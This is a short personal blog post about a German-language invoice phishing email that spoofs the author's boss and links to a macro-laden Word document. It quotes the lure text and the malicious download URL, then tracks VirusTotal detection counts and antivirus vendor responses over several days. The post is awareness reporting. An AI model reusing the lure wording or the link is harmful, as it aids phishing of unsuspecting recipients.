• 25
    Aug - 2017

    Security
    2 min | 818

    #Security: Phishing with Macros! (updated)

    Security | 2 min | 818


    Hi!

    Yesterday I received an email from an address that should look like my boss email address. It was something like this: "Boss.Name@our-institute.uni-hannover.de nancy@hillstar.brcoxmail.com" with the subject: Rech QK - 163-DA7666 Riva, Mauro and a text saying:

    Guten Tag, Riva, Mauro
    
    Als Anhang erhalten Sie Ihre Rechnung. (something like "You receive your invoice as an attachment.")
    
    Rech:
    http://blackbox-es.com/Rechnung-26375407950/ (don't click this link --> read all the post!!!)
    
    Herzliche Grüße (Grüße: Grüße)
    
    boss.name@our-institute.uni-hannover.de
    

    As you see, there is a link to the Blackbox-ES company website based in Kaysville, UT, USA.

    You are obviously going to say phishing! That's for sure! But I clicked on the link to check it out! I used a Tor browser (I didn't want to give my IP). The link started a download of a word document with name Rechnungs-Details-43154391936.doc, and again obviously with macros inside!: A payload! I haven't opened it yet, but I am going to use a virtual machine this weekend, that I usually use for that. I want to read the payload and if it's possible check the remote host address.

    I uploaded it to VirusTotal and at first time (yesterday at 10 a.m.), only 4 antivirus were able to detect the file as a threat! Now, I uploaded it again and I got the following report:

    Macro Virus
    VirusTotal report

    Only 7 antivirus detect the file as a threat! I still have the file on my download folder and the Microsoft Security Essentials is not reporting or deleting it!!! Nice! :S

    I've done the following things:

    I found the following report: https://goo.gl/yPakSa It contains more information about the payload!

    (I haven't check the email nancy@hillstar.brcoxmail.com yet, but it probably doesn't exist neither the domain)

    We will see tomorrow!

    Notes:

    • (1) I've just received an email from Kaspersky Lab with following content:
      Malicious code detected by Kaspersky Lab products with KSN technology enabled has been found in the following files:
      Rechnungs-Details-43154391936.doc - UDS:DangerousObject.Multi.Generic
    • (2) Microsoft reports the following: Microsoft Report

    Updates:

    25.08.2017 10:20: 11 Antivirus (Microsoft still reports the file as clean!) Update 20170825 10:20

    Last update (03.09.2017 23:00): 31 Antivirus (Microsoft still reports the file as clean! I've submitted it twice, but no chance!) Last Update 20170903 23:00


    Comments

    Empty